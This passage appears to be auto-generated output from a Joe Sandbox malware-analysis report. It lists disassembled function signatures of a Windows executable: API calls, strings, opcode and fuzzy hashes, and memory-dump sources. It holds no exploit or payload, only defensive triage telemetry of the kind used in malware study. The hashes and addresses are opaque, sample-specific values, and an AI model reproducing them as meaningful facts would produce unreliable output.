        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: _free$ErrorFreeHeapLast
        • String ID:
        • API String ID: 776569668-0
        • Opcode ID: fad2f727a77d0b5caf266725a7666e15ad2fc43954351253b2eee340b5c74f34
        • Instruction ID: a9a0e212b78e9572192223e41e99ae8bd0bd79b2d5b239b11f2058b32e74adbc
        • Opcode Fuzzy Hash: fad2f727a77d0b5caf266725a7666e15ad2fc43954351253b2eee340b5c74f34
        • Instruction Fuzzy Hash: F411B676141108BFCB01EF54E956CDD3BA9EF24351B9780A1FA588F232DB31EE519B82
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
        • String ID: csm$csm$csm
        • API String ID: 322700389-393685449
        • Opcode ID: 9ff01ec809be0903b1cb7e48bd9660f1ab0dc0c864c46538be8b449c747bbdf8
        • Instruction ID: ab9803c8172ec995fb63e3b46ef5b678d18443b697e3c2015ed7e1f650980849
        • Opcode Fuzzy Hash: 9ff01ec809be0903b1cb7e48bd9660f1ab0dc0c864c46538be8b449c747bbdf8
        • Instruction Fuzzy Hash: 17B19C71800219EFCF18DFA4D881AAEBBB5FF24310F15416AF8156B222D771EE61CB91
        APIs
        • __EH_prolog.LIBCMT ref: 0012C3FC
        • CoCreateInstance.COMBASE(001568A0,00000000,00000001,001567D0,?), ref: 0012C41E
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: CreateH_prologInstance
        • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
        • API String ID: 457505298-3505469590
        • Opcode ID: 682e9d6bc0bb00122552f6538dd8a654a98391fdf5e48f20aa8e11e8644cf664
        • Instruction ID: dc4f19871bfc6f26ea47ed832218a23982b85c9acea3563cb2311a26655d5b2a
        • Opcode Fuzzy Hash: 682e9d6bc0bb00122552f6538dd8a654a98391fdf5e48f20aa8e11e8644cf664
        • Instruction Fuzzy Hash: 00716C71A00229EFDB14DFA4EC949AFB7B9FF48315B140559F512EB6A0CB30AD41CBA0
        APIs
          • Part of subcall function 001212F6: GetParent.USER32(?), ref: 0012132A
          • Part of subcall function 001212F6: GetDlgItem.USER32(00000000,00003021), ref: 0012133A
          • Part of subcall function 001212F6: SetWindowTextW.USER32(00000000,001545F4), ref: 00121350
        • EndDialog.USER32(?,00000001), ref: 0013C7F0
        • SendMessageW.USER32(?,00000080,00000001,?), ref: 0013C817
        • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0013C830
        • SetWindowTextW.USER32(?,?), ref: 0013C841
        • GetDlgItem.USER32(?,00000065), ref: 0013C84A
        • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0013C85E
        • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0013C874
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: MessageSend$Item$TextWindow$DialogParent
        • String ID: LICENSEDLG
        • API String ID: 4098686847-2177901306
        • Opcode ID: f708a58518dc01daade81688e7a74e871bdc43c61a30647b276fb34b726d217a
        • Instruction ID: 029dc431d143179893e567a2c383a8133b86dd95217921c635c2370580e4cf75
        • Opcode Fuzzy Hash: f708a58518dc01daade81688e7a74e871bdc43c61a30647b276fb34b726d217a
        • Instruction Fuzzy Hash: ED21C432240604BBE7115F75EC4DF3B3BAEEB46B85F014015FA01F68A0CB629E819BB1
        APIs
        • _wcslen.LIBCMT ref: 0012B5E2
          • Part of subcall function 001326F1: GetSystemTime.KERNEL32(?), ref: 001326FF
          • Part of subcall function 001326F1: SystemTimeToFileTime.KERNEL32(?,?), ref: 0013270D
          • Part of subcall function 0013269A: __aulldiv.LIBCMT ref: 001326A3
        • __aulldiv.LIBCMT ref: 0012B60E
        • GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,00000800,?), ref: 0012B615
        • _swprintf.LIBCMT ref: 0012B640
          • Part of subcall function 00124A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00124A33
        • _wcslen.LIBCMT ref: 0012B64A
        • _swprintf.LIBCMT ref: 0012B6A0
        • _wcslen.LIBCMT ref: 0012B6AA
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Time_wcslen$System__aulldiv_swprintf$CurrentFileProcess__vswprintf_c_l
        • String ID: %u.%03u
        • API String ID: 2956649372-1114938957
        • Opcode ID: 61c42332af7b5ee3c3e2d4fd855e165ba3c5115ba95f78039825af7bd0e17891
        • Instruction ID: 24274320da8ef7fa30ad2ba674c9e553781aa73caf6f5e861c4978861c35aba7
        • Opcode Fuzzy Hash: 61c42332af7b5ee3c3e2d4fd855e165ba3c5115ba95f78039825af7bd0e17891
        • Instruction Fuzzy Hash: 8F21B5B2A08310AFC714EF65DC86EAF77ECEBA8700F004929F545D7251DB30DA0887A2
        APIs
        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0013BC2F
        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0013BC40
        • SystemTimeToFileTime.KERNEL32(?,?), ref: 0013BC4E
        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0013BC5C
        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0013BC77
        • GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032), ref: 0013BC9E
        • _swprintf.LIBCMT ref: 0013BCC4
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Time$System$File$Format$DateLocalSpecific_swprintf
        • String ID: %s %s
        • API String ID: 385609497-2939940506
        • Opcode ID: d0021a2310d2adee722506a1dafceba89a38a1b995b134c96b723bb73abb72c0
        • Instruction ID: d37b92b677b171824b0fde949053d4775c9f02f60eb036ee4086769fe556981a
        • Opcode Fuzzy Hash: d0021a2310d2adee722506a1dafceba89a38a1b995b134c96b723bb73abb72c0
        • Instruction Fuzzy Hash: 3721C7B254115CABDB21DFA0EC85EEF3BACFF59305F140026FA19D6111E730EA898B60
        APIs
        • MultiByteToWideChar.KERNEL32(00000000,00000000,0012C43F,0012C441,00000000,00000000,CA793DC2,00000001,00000000,00000000,0012C32C,?,?,?,0012C43F,ROOT\CIMV2), ref: 00140F49
        • MultiByteToWideChar.KERNEL32(00000000,00000000,0012C43F,?,00000000,00000000,?,?,?,?,?,0012C43F), ref: 00140FC4
        • SysAllocString.OLEAUT32(00000000), ref: 00140FCF
        • _com_issue_error.COMSUPP ref: 00140FF8
        • _com_issue_error.COMSUPP ref: 00141002
        • GetLastError.KERNEL32(80070057,CA793DC2,00000001,00000000,00000000,0012C32C,?,?,?,0012C43F,ROOT\CIMV2), ref: 00141007
        • _com_issue_error.COMSUPP ref: 0014101A
        • GetLastError.KERNEL32(00000000,?,0012C43F,ROOT\CIMV2), ref: 00141030
        • _com_issue_error.COMSUPP ref: 00141043
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
        • String ID:
        • API String ID: 1353541977-0
        • Opcode ID: 722dc2d474ff6bed272bc629d003e972c0fd5e02193a142f58cfd976a93d80b9
        • Instruction ID: a1af4c8a86482a4cb5835ef1a54cad6e319f3f55c03330c3368104a186430cd9
        • Opcode Fuzzy Hash: 722dc2d474ff6bed272bc629d003e972c0fd5e02193a142f58cfd976a93d80b9
        • Instruction Fuzzy Hash: 94411AB1A00315EBC711DF65DC45BAEBBA9EB4C710F10422AF605E72A0D775A8848BE4
        APIs
        • _wcslen.LIBCMT ref: 0013E8EE
        • ShowWindow.USER32(?,00000000), ref: 0013EA5D
        • GetExitCodeProcess.KERNEL32(?,?), ref: 0013EA99
        • CloseHandle.KERNEL32(?), ref: 0013EABF
        • ShowWindow.USER32(?,00000001), ref: 0013EB21
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ShowWindow$CloseCodeExitHandleProcess_wcslen
        • String ID: .exe$.inf
        • API String ID: 783751319-3750412487
        • Opcode ID: 8d81a464152269ac5b0da4701d3c551484a6296cb76e1ab078abb0df2d2c3d18
        • Instruction ID: 3fdac1150d0ef0c66ca798209d2612e73016dc59474c42175786ba8366afbc88
        • Opcode Fuzzy Hash: 8d81a464152269ac5b0da4701d3c551484a6296cb76e1ab078abb0df2d2c3d18
        • Instruction Fuzzy Hash: A951F231148380AAEB319F20D844BBBBBE9EF84748F04481DF5C5972E4EB718989CB52
        APIs
        • __EH_prolog.LIBCMT ref: 0012A5EE
        • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0012A611
        • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0012A630
          • Part of subcall function 0012D6A7: _wcslen.LIBCMT ref: 0012D6AF
          • Part of subcall function 00133306: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013306,0012D523,00000000,.exe,?,?,00000800,?,?,?,00139E4C), ref: 0013331C
        • _swprintf.LIBCMT ref: 0012A6CC
          • Part of subcall function 00124A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00124A33
        • MoveFileW.KERNEL32(?,?), ref: 0012A73B
        • MoveFileW.KERNEL32(?,?), ref: 0012A77B
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
        • String ID: rtmp%d
        • API String ID: 3726343395-3303766350
        • Opcode ID: 2302ff4036a0cca206399062ccdc8411cbfd770dc1f2d7a074060d6e88500bf9
        • Instruction ID: d05571918295dd1e528f052084537f3efa8b00374737f7fb93ac57f41a8e0026
        • Opcode Fuzzy Hash: 2302ff4036a0cca206399062ccdc8411cbfd770dc1f2d7a074060d6e88500bf9
        • Instruction Fuzzy Hash: F7417C71900279ABCF20ABA0EC94EEF737CBF64345F4404A5B546E3046EB358A95CF65
        APIs
        • __aulldiv.LIBCMT ref: 0013253E
          • Part of subcall function 0012C619: GetVersionExW.KERNEL32(?), ref: 0012C63E
        • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,00000001), ref: 00132561
        • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,00000001), ref: 00132573
        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00132584
        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00132594
        • SystemTimeToFileTime.KERNEL32(?,?), ref: 001325A4
        • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 001325DF
        • __aullrem.LIBCMT ref: 00132689
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
        • String ID:
        • API String ID: 1247370737-0
        • Opcode ID: dd3318d55d85d422435d4f0843a5dac8dd876c74f709da27226abef3c3e2133a
        • Instruction ID: 098b5b7ae84b588a2ce8970f46202bd60d5bbba9dea3920064f7329d6fbe7217
        • Opcode Fuzzy Hash: dd3318d55d85d422435d4f0843a5dac8dd876c74f709da27226abef3c3e2133a
        • Instruction Fuzzy Hash: B44117B1508305AFC710DF65D88096BBBF9FF98315F00892EF99AC6210E735E589CB62
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: _wcslen
        • String ID: </p>$</style>$<br>$<style>$>
        • API String ID: 176396367-3568243669
        • Opcode ID: 323d75141b7e5f7f26c0597762166bf0ac7cf40eaf3385785afb2e52138ba01c
        • Instruction ID: 9d15c1a338e3c976b4598b9ff03d3c4c3a1f6a9d1d25ba7d9ade33c492f8750c
        • Opcode Fuzzy Hash: 323d75141b7e5f7f26c0597762166bf0ac7cf40eaf3385785afb2e52138ba01c
        • Instruction Fuzzy Hash: CF51296674032395DB305A98982177673E5EF64752FE8442BFDC1CF5C0FB658D8182A3
        APIs
        • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00150FB2,00000000,00000000,00000000,00000000,00000000,?), ref: 0015087F
        • __fassign.LIBCMT ref: 001508FA
        • __fassign.LIBCMT ref: 00150915
        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0015093B
        • WriteFile.KERNEL32(?,00000000,00000000,00150FB2,00000000,?,?,?,?,?,?,?,?,?,00150FB2,00000000), ref: 0015095A
        • WriteFile.KERNEL32(?,00000000,00000001,00150FB2,00000000,?,?,?,?,?,?,?,?,?,00150FB2,00000000), ref: 00150993
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
        • String ID:
        • API String ID: 1324828854-0
        • Opcode ID: 125762f146a3e267576352b29a68be769da250238b49b41d673a3fa8fa061eb7
        • Instruction ID: c89fca0ab3621c611872d42362e4d2a2cd4cd09a53da73cd27c172c4abafad79
        • Opcode Fuzzy Hash: 125762f146a3e267576352b29a68be769da250238b49b41d673a3fa8fa061eb7
        • Instruction Fuzzy Hash: 3B5182B1A00249DFDB11CFE8D885AEEBBB4EF4D315F14411AE965EB252E7309984CB60
        APIs
        • _ValidateLocalCookies.LIBCMT ref: 00143AB7
        • ___except_validate_context_record.LIBVCRUNTIME ref: 00143ABF
        • _ValidateLocalCookies.LIBCMT ref: 00143B48
        • __IsNonwritableInCurrentImage.LIBCMT ref: 00143B73
        • _ValidateLocalCookies.LIBCMT ref: 00143BC8
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
        • String ID: csm
        • API String ID: 1170836740-1018135373
        • Opcode ID: 282b95c91e68768744234bca6b8e354afe9e0e293525f49388114f3b66e23bd5
        • Instruction ID: b02d18efc83430f3c98c44fdf58882dd155b66200e00005984110611dfac7651
        • Opcode Fuzzy Hash: 282b95c91e68768744234bca6b8e354afe9e0e293525f49388114f3b66e23bd5
        • Instruction Fuzzy Hash: 2041A234A00218DFCF10DF69C885B9EBBB5EF55328F148165E8249B3A2D731AB55CB90
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: _wcslen
        • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
        • API String ID: 176396367-3743748572
        • Opcode ID: 70800871b63892d11a760962c7ecda2d590a6499f08bad9989f492989e77b0a5
        • Instruction ID: ce861711c4a7cc1af3ea91040a24524753130846209aa28e63a1f4c3d54d8fa9
        • Opcode Fuzzy Hash: 70800871b63892d11a760962c7ecda2d590a6499f08bad9989f492989e77b0a5
        • Instruction Fuzzy Hash: AA314D23644301A6D734AB549C42B7A73E4EF60760FE0842FF9D56B2D1FB64AC44C3A2
        APIs
          • Part of subcall function 0014DA18: _free.LIBCMT ref: 0014DA41
        • _free.LIBCMT ref: 0014DAA2
          • Part of subcall function 0014A65A: RtlFreeHeap.NTDLL(00000000,00000000,?,0014DA46,00154ADC,00000000,00154ADC,00000000,?,0014DA6D,00154ADC,00000007,00154ADC,?,0014DE6A,00154ADC), ref: 0014A670
          • Part of subcall function 0014A65A: GetLastError.KERNEL32(00154ADC,?,0014DA46,00154ADC,00000000,00154ADC,00000000,?,0014DA6D,00154ADC,00000007,00154ADC,?,0014DE6A,00154ADC,00154ADC), ref: 0014A682
        • _free.LIBCMT ref: 0014DAAD
        • _free.LIBCMT ref: 0014DAB8
        • _free.LIBCMT ref: 0014DB0C
        • _free.LIBCMT ref: 0014DB17
        • _free.LIBCMT ref: 0014DB22
        • _free.LIBCMT ref: 0014DB2D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: _free$ErrorFreeHeapLast
        • String ID:
        • API String ID: 776569668-0
        • Opcode ID: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
        • Instruction ID: acefab7dc6defc40b96595dd9b589b33508e9d3785c41f3b181e5e7878ff5d05
        • Opcode Fuzzy Hash: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
        • Instruction Fuzzy Hash: 41114C71985B04BADA20BBB0EC0BFCB779CAF30740F854C15B29AB7072DB65B5058792
        APIs
        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0013F7E5,0013F748,0013F9E9), ref: 0013F781
        • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0013F797
        • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0013F7AC
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
